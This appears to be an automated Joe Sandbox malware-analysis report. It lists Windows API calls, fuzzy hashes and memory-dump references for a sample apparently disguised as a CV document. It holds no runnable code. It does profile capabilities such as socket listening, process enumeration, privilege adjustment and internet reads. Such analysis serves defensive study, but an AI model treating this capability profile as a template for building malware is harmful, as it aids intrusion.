                                                                                        • Opcode ID: 695289967f1dc5bb10db4bda0d233f28f67ba6ee48e2357ce41f9a098f1801bb
                                                                                        • Instruction ID: bfc76e7116e2c49139fb3ff1239969019a868e12c8523ef681b54db86c68993f
                                                                                        • Opcode Fuzzy Hash: 695289967f1dc5bb10db4bda0d233f28f67ba6ee48e2357ce41f9a098f1801bb
                                                                                        • Instruction Fuzzy Hash: 4601FC796582116AF72E6674CC4AFBF725C9704340F15142CBD13F21D1D5719E0087B4
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003D8CA8
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D8CB7
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 003D8CD3
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 003D8CE2
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D8CFC
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 003D8D10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1279440585-0
                                                                                        • Opcode ID: 9d97d1a85e5794debeaf0eac8869336356257ee1b9ca8a6e67ade6f9ce7e0653
                                                                                        • Instruction ID: 38e32728c39cf233401c9aa2fd2e50ed083582e60e4343160a30196891fa2688
                                                                                        • Opcode Fuzzy Hash: 9d97d1a85e5794debeaf0eac8869336356257ee1b9ca8a6e67ade6f9ce7e0653
                                                                                        • Instruction Fuzzy Hash: 5621F332A00200EFCB12EF68DD45B6EB7A9EF48710F108159F916AB3D2CB70AD05CB51
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003C6554
                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 003C6564
                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 003C6583
                                                                                        • __wsplitpath.LIBCMT ref: 003C65A7
                                                                                        • _wcscat.LIBCMT ref: 003C65BA
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003C65F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                        • String ID:
                                                                                        • API String ID: 1605983538-0
                                                                                        • Opcode ID: f6e80eea7a71e52b6277ae37c309cad7c240ccb44354f50d2105136d81ba5b07
                                                                                        • Instruction ID: d550b9b870b36f25e3c57788079927f407e5a08f15f338d7ab404b3bdd6b94fb
                                                                                        • Opcode Fuzzy Hash: f6e80eea7a71e52b6277ae37c309cad7c240ccb44354f50d2105136d81ba5b07
                                                                                        • Instruction Fuzzy Hash: CA218471D00218ABDB11ABA4CD89FEEBBBCAB49300F6004A9F505E7141EB759F85CB61
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$B
                                                                                        • API String ID: 0-117492517
                                                                                        • Opcode ID: e69a597b2f750ba36bad1dfa4b0007930b83b7e39691b752aa1f194f869a410b
                                                                                        • Instruction ID: d7906bf1d0f6fdf9732dcecd875ca40dd2353b63086f1930cba1e8125c9e0ab3
                                                                                        • Opcode Fuzzy Hash: e69a597b2f750ba36bad1dfa4b0007930b83b7e39691b752aa1f194f869a410b
                                                                                        • Instruction Fuzzy Hash: C8927D71A0061ACBEF25DF58C8807BEB7B1BB54314F1582ABE816BB380D7749D81CB95
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003C13DC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: ($,2C$<2C$|
                                                                                        • API String ID: 1659193697-3219782434
                                                                                        • Opcode ID: 03df712f08fcf911b9731d2e9ac6c1925637e34a4f898e5e1e7da511686168ca
                                                                                        • Instruction ID: 817455c79c8691425d9f84ee52ed783834bb85bbab96c8585288e62376b2b53a
                                                                                        • Opcode Fuzzy Hash: 03df712f08fcf911b9731d2e9ac6c1925637e34a4f898e5e1e7da511686168ca
                                                                                        • Instruction Fuzzy Hash: A0321475A006059FCB29CF69C480E6AB7F0FF49320B12C56EE49ADB7A2D770E941CB44
                                                                                        APIs
                                                                                          • Part of subcall function 003DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 003DA84E
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 003D9296
                                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 003D92B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 4170576061-0
                                                                                        • Opcode ID: d3d725d5f8c31bbc8cdc986c4a9613da7f6804643ab30157144af3d84a705e87
                                                                                        • Instruction ID: 39d37d96d68dfe8a2fc3c1f4a520d122e4c838baefc8149c6b199d46baf733bc
                                                                                        • Opcode Fuzzy Hash: d3d725d5f8c31bbc8cdc986c4a9613da7f6804643ab30157144af3d84a705e87
                                                                                        • Instruction Fuzzy Hash: 5E41CE71A00204AFDB16BB68CC82F7E77EDEF44728F048459F956AB392DB749D018B91
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003CEB8A
                                                                                        • _wcscmp.LIBCMT ref: 003CEBBA
                                                                                        • _wcscmp.LIBCMT ref: 003CEBCF
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 003CEBE0
                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 003CEC0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 2387731787-0
                                                                                        • Opcode ID: 32081f5bd302b1cf806463109de704530619ffaf8c2d42e7390faef9e5eee745
                                                                                        • Instruction ID: e41ba923017f5e2932117381b9cbabd8023fa15b8e8ed8f38b871c3ab69a5846
                                                                                        • Opcode Fuzzy Hash: 32081f5bd302b1cf806463109de704530619ffaf8c2d42e7390faef9e5eee745
                                                                                        • Instruction Fuzzy Hash: 1A41BB356046029FCB09DF68C491EAAB3E8FF49324F10855EE95ACB3A1DB31ED44CB95
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        • Opcode ID: 0a6277ba88675673d8fcea482e9d154719f565823fdd3555c84ec305f303fa2c
                                                                                        • Instruction ID: 28a5c987c82a0779a545d5c1066a6d451b77d531f769fd78301729bb7a03d24d
                                                                                        • Opcode Fuzzy Hash: 0a6277ba88675673d8fcea482e9d154719f565823fdd3555c84ec305f303fa2c
                                                                                        • Instruction Fuzzy Hash: 06119031B006606FE7226F66DD44A6F779CEF44760B050529F849E7281CF30E90286A4
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0039E014,74DF0AE0,0039DEF1,0041DC38,?,?), ref: 0039E02C
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0039E03E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                        • API String ID: 2574300362-192647395
                                                                                        • Opcode ID: f1c4f0a45428a65fbdacf12a0a76d77f43047358237d1cbbd85e61de05964c21
                                                                                        • Instruction ID: bea25011cebd8522d5ff7be4a36515865c99f840744a1415beda05c1f662e177
                                                                                        • Opcode Fuzzy Hash: f1c4f0a45428a65fbdacf12a0a76d77f43047358237d1cbbd85e61de05964c21
                                                                                        • Instruction Fuzzy Hash: 6ED0A7318007129FCB329FA2EE0A71276D5AB08301F29843AE881E2250FBF8C8848654
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 0039B22F
                                                                                          • Part of subcall function 0039B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0039B5A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Proc$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2749884682-0
                                                                                        • Opcode ID: 1708b3f302f7052ad9302b54269ca43b9193cc0945f18bde356d6fe0ca568c85
                                                                                        • Instruction ID: 2e222738d95d66247750749bf239a29265e12600e66c370e2f70531865eb3deb
                                                                                        • Opcode Fuzzy Hash: 1708b3f302f7052ad9302b54269ca43b9193cc0945f18bde356d6fe0ca568c85
                                                                                        • Instruction Fuzzy Hash: A7A18F70114109BADF3BAF6B7E88D7FA95DEB42740B124A2DF581DA9E1CB24DC00D272
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003D43BF,00000000), ref: 003D4FA6
                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003D4FD2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 599397726-0
                                                                                        • Opcode ID: 9530bb12751286ab6b96cb07b912aaf8826fb21d7c48980da636cca28b92481b
                                                                                        • Instruction ID: 9d71dbe9311cfa2da416692a12bbf37827264071a21bacc8867731805a04a5b1
                                                                                        • Opcode Fuzzy Hash: 9530bb12751286ab6b96cb07b912aaf8826fb21d7c48980da636cca28b92481b
                                                                                        • Instruction Fuzzy Hash: 3041E773904209BFEB22DF94ED81FBFB7BCEB40754F10402BF205A6290DA719E4596A0
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID: \QC
                                                                                        • API String ID: 4104443479-3599921913
                                                                                        • Opcode ID: 469d456c8af3bf84d0805f8431589c5c830c1ca61e1c2dac828d5d2ef0ba6547
                                                                                        • Instruction ID: c7cd03fba19a753b6455e8ab2abe9ea92a35e3709acb3544c0f2877bc789bd9a
                                                                                        • Opcode Fuzzy Hash: 469d456c8af3bf84d0805f8431589c5c830c1ca61e1c2dac828d5d2ef0ba6547
                                                                                        • Instruction Fuzzy Hash: EAA25B74A04219CFCB25DF58C4807ADBBB2FF48314F2581AAE859AB390D7749E81DF94
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003CE20D
                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 003CE267
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 003CE2B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 1682464887-0
                                                                                        • Opcode ID: 4f569b72c02db86f2f6c08ff6a0ab7ed378a2ca87ecf4c40d9a0b6e6e29ba2d4
                                                                                        • Instruction ID: 84ddbe1383daa7e54d7c1e2ed592d15b72ca1b6bc1afc9d4dc120d5419eafadb
                                                                                        • Opcode Fuzzy Hash: 4f569b72c02db86f2f6c08ff6a0ab7ed378a2ca87ecf4c40d9a0b6e6e29ba2d4
                                                                                        • Instruction Fuzzy Hash: FB216D35A00618EFCB01EFA5D885EAEFBB8FF48310F0484A9E905EB251DB31D905CB54
                                                                                        APIs
                                                                                          • Part of subcall function 0039F4EA: std::exception::exception.LIBCMT ref: 0039F51E
                                                                                          • Part of subcall function 0039F4EA: __CxxThrowException@8.LIBCMT ref: 0039F533
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003BB180
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003BB1AD
                                                                                        • GetLastError.KERNEL32 ref: 003BB1BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1922334811-0
                                                                                        • Opcode ID: 221251f1e997057f0bd5c633ed2d2ec067196d115413cedcab9f6f335e086eff
                                                                                        • Instruction ID: f607098f2ad1b34b1b85a1ef85d4f98d4784494f7c536d2bafc2de04a42838d8
                                                                                        • Opcode Fuzzy Hash: 221251f1e997057f0bd5c633ed2d2ec067196d115413cedcab9f6f335e086eff
                                                                                        • Instruction Fuzzy Hash: 9111C1B1800204AFE7189F58DCC5D6BB7BCFB44314B20852EF45697640DBB0FC418B60
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003C6623
                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 003C6664
                                                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003C666F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 33631002-0
                                                                                        • Opcode ID: 9c91877a44f0f2195f135102448c5417e77d84d713159957523564e0ebeb7ddc
                                                                                        • Instruction ID: cdc1ce2b596ae334ee9c9ad8523d46974a4ff2945bf79a51a8b997df2a452f86
                                                                                        • Opcode Fuzzy Hash: 9c91877a44f0f2195f135102448c5417e77d84d713159957523564e0ebeb7ddc
                                                                                        • Instruction Fuzzy Hash: 46110C71E01228BFDB118FA59D45FAEBBBCEB49B10F104166F900F6290D6B05E058BA5
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 003C7223
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 003C723A
                                                                                        • FreeSid.ADVAPI32(?), ref: 003C724A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        • Opcode ID: 5c743a5378a6cbcdd885ed2e863ca642aa3bc20a3ed406e2bf590b9bb7a159db
                                                                                        • Instruction ID: 9e9a686b9f2d1c73ac8e572638c35d98defa81d161dd3ae97f9491e7b47c8835
                                                                                        • Opcode Fuzzy Hash: 5c743a5378a6cbcdd885ed2e863ca642aa3bc20a3ed406e2bf590b9bb7a159db
                                                                                        • Instruction Fuzzy Hash: 88F01D76E04209BFDF04DFF4DD89EEEBBB8EF08205F104869A606F2191E2709A448B14
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 003CF599
                                                                                        • FindClose.KERNEL32(00000000), ref: 003CF5C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: 3949a83f321ce68b04475ab3ce9a0f2172e4ae1813557d724e0489b2ca757175
                                                                                        • Instruction ID: 834d4609ba5b732c0ad91657acf7fc4effed0ad77a58edaaf3dde17c28c8df5f
                                                                                        • Opcode Fuzzy Hash: 3949a83f321ce68b04475ab3ce9a0f2172e4ae1813557d724e0489b2ca757175
                                                                                        • Instruction Fuzzy Hash: EA11A5316006009FD701EF28D845A2EB3E9FF85324F00851EF965DB291CB30ED048B85
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,003DBE6A,?,?,00000000,?), ref: 003CCEA7
                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,003DBE6A,?,?,00000000,?), ref: 003CCEB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
